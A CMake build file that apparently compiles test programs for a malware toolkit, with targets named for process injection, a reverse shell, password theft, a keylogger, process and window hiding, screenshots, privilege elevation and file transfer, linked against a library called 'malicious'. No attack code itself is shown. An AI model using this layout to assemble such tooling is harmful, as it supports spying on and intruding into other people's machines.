# Windows audit unit tests
if(WIN32)
	set(ISINJECTED_TARGET "isinjected")
	file(GLOB_RECURSE ${ISINJECTED_TARGET}_source_files ${ISINJECTED_TARGET}/*)
	add_library(${ISINJECTED_TARGET} SHARED ${isinjected_source_files})
	target_link_libraries(isinjected system network common)
	set_target_properties(isinjected PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(INJECTION_TARGET "injection")
	file(GLOB_RECURSE ${INJECTION_TARGET}_source_files ${INJECTION_TARGET}/*)
	add_executable(${INJECTION_TARGET} ${injection_source_files})
	target_link_libraries(injection common malicious system network)
	add_dependencies(injection dll)
	set_target_properties(injection PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(REGISTRY_TARGET "registry")
	file(GLOB_RECURSE ${REGISTRY_TARGET}_source_files ${REGISTRY_TARGET}/*)
	add_executable(${REGISTRY_TARGET} ${registry_source_files})
	target_link_libraries(${REGISTRY_TARGET} system network common)
	set_target_properties(${REGISTRY_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(RSHELL_TARGET "rshell")
	file(GLOB_RECURSE ${RSHELL_TARGET}_source_files ${RSHELL_TARGET}/*)
	add_executable(${RSHELL_TARGET} ${rshell_source_files})
	target_link_libraries(${RSHELL_TARGET} common network)
	set_target_properties(${RSHELL_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(PASSWORDS_TARGET "passwords")
	file(GLOB_RECURSE ${PASSWORDS_TARGET}_source_files ${PASSWORDS_TARGET}/*)
	add_executable(${PASSWORDS_TARGET} ${passwords_source_files})
	target_link_libraries(${PASSWORDS_TARGET} malicious userenv common network)
	set_target_properties(${PASSWORDS_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(KEYHOOKER_TARGET "keyhooker")
	file(GLOB_RECURSE ${KEYHOOKER_TARGET}_source_files ${KEYHOOKER_TARGET}/*)
	add_executable(${KEYHOOKER_TARGET} ${keyhooker_source_files})
	target_link_libraries(${KEYHOOKER_TARGET} system malicious common network)
	set_target_properties(${KEYHOOKER_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(PIPE_TARGET "pipe")
	file(GLOB_RECURSE ${PIPE_TARGET}_source_files ${PIPE_TARGET}/*)
	add_executable(${PIPE_TARGET} ${pipe_source_files})
	target_link_libraries(${PIPE_TARGET} system common network)
	set_target_properties(${PIPE_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(HIDEPROC_TARGET "hideproc")
	file(GLOB_RECURSE ${HIDEPROC_TARGET}_source_files ${HIDEPROC_TARGET}/*)
	add_executable(${HIDEPROC_TARGET} ${hideproc_source_files})
	target_link_libraries(${HIDEPROC_TARGET} system malicious common network)
	set_target_properties(${HIDEPROC_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(HIDEWIN_TARGET "hidewin")
	file(GLOB_RECURSE ${HIDEWIN_TARGET}_source_files ${HIDEWIN_TARGET}/*)
	add_executable(${HIDEWIN_TARGET} ${hidewin_source_files})
	target_link_libraries(${HIDEWIN_TARGET} system malicious common network)
	set_target_properties(${HIDEWIN_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(SCREENSHOT_TARGET "screenshot")
	file(GLOB_RECURSE ${SCREENSHOT_TARGET}_source_files ${SCREENSHOT_TARGET}/*)
	add_executable(${SCREENSHOT_TARGET} ${screenshot_source_files})
	target_link_libraries(${SCREENSHOT_TARGET} system malicious common network)
	set_target_properties(${SCREENSHOT_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(ELEVATOR_TARGET "elevator")
	file(GLOB_RECURSE ${ELEVATOR_TARGET}_source_files ${ELEVATOR_TARGET}/*)
	add_executable(${ELEVATOR_TARGET} ${elevator_source_files})
	target_link_libraries(${ELEVATOR_TARGET} system common network malicious)
	set_target_properties(${ELEVATOR_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(ISADMIN_TARGET "isadmin")
	file(GLOB_RECURSE ${ISADMIN_TARGET}_source_files ${ISADMIN_TARGET}/*)
	add_executable(${ISADMIN_TARGET} ${isadmin_source_files})
	target_link_libraries(${ISADMIN_TARGET} system common network)
	set_target_properties(${ISADMIN_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
	
	set(LOADSLAVE_TARGET "loadslave")
	file(GLOB_RECURSE ${LOADSLAVE_TARGET}_source_files ${LOADSLAVE_TARGET}/*)
	add_executable(${LOADSLAVE_TARGET} ${loadslave_source_files})
	# target_link_libraries(${LOADSLAVE_TARGET} system common network)
	set_target_properties(${LOADSLAVE_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
endif ()

# Portable tests
set(SESSION_TARGET "session")
file(GLOB_RECURSE ${SESSION_TARGET}_source_files ${SESSION_TARGET}/*)
add_executable(${SESSION_TARGET} ${session_source_files})
target_link_libraries(${SESSION_TARGET} system blaspheme common network)
set_target_properties(${SESSION_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})

set(MAIL_TARGET "mail")
file(GLOB_RECURSE ${MAIL_TARGET}_source_files ${MAIL_TARGET}/*)
add_executable(${MAIL_TARGET} ${mail_source_files})
target_link_libraries(${MAIL_TARGET} system malicious common network)
set_target_properties(${MAIL_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})

set(TRANSFER_TARGET "transfer")
file(GLOB_RECURSE ${TRANSFER_TARGET}_source_files ${TRANSFER_TARGET}/*)
add_executable(${TRANSFER_TARGET} ${transfer_source_files})
target_link_libraries(${TRANSFER_TARGET} system network common blaspheme)
set_target_properties(${TRANSFER_TARGET} PROPERTIES COMPILE_FLAGS ${BUILD_FLAGS_MT})
